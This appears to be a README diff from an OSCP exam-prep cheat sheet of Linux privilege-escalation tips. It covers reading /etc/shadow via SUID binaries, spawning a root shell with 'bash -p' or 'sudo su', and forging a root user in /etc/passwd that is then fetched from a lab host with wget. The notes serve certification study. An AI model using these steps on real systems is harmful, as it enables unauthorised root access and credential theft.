redcountryroad/OSCP-shortsheet/README.md

 ## General tips
 - If Linpeas cannot found vulnerabilties, use linux-exploit-suggester (https://github.com/mzet-/linux-exploit-suggester)
 - /dev/null is the standard Linux device where you send output that you want ignored.
+- if mount point is needed, try to use /etc , so we can access /etc/passwd
 - /tmp directory has all permission to create or delete any file, use it
 - if SUID is set ofr a binary program and to GTFObins requires LFILE=file_to_read, we can set LFILE=/etc/shadow, and unhash the password and do a 'su' or switch user.
 - If "/bin/bash" has SUID set, user can execute “bash -p” and this should allow you to run the bash as root.
 - If a user can run all command as root user, we can achieve root access by performing 'sudo su' or 'sudo bash'
+- If program/exploit cannot run, try 'chmod +x exploit' or 'chmod 777 exploit'
 - if '/bin/bash' doesnt work, try '/bin/sh'
 - to run binary program, can specify '/home' instead of current directory '.'
 - [if SUID bit set for cp, we can add a new user with root privileges to /etc/passwd file] to create new user(name: ignite) at end of /etc/passwd, first generate the $hash value first using 'openssl passwd -1 -salt ignite pass123'.
 Then insert $hash into 'ignite:$hash:0:0:root:/root:/bin/bash'.
 Then copy the passwd file back to victim machine (/etc) using 'wget -O passwd http://192.168.1.108:8000/passwd'.
 Then 'su ignite' password: 'pass123', 'whoami'.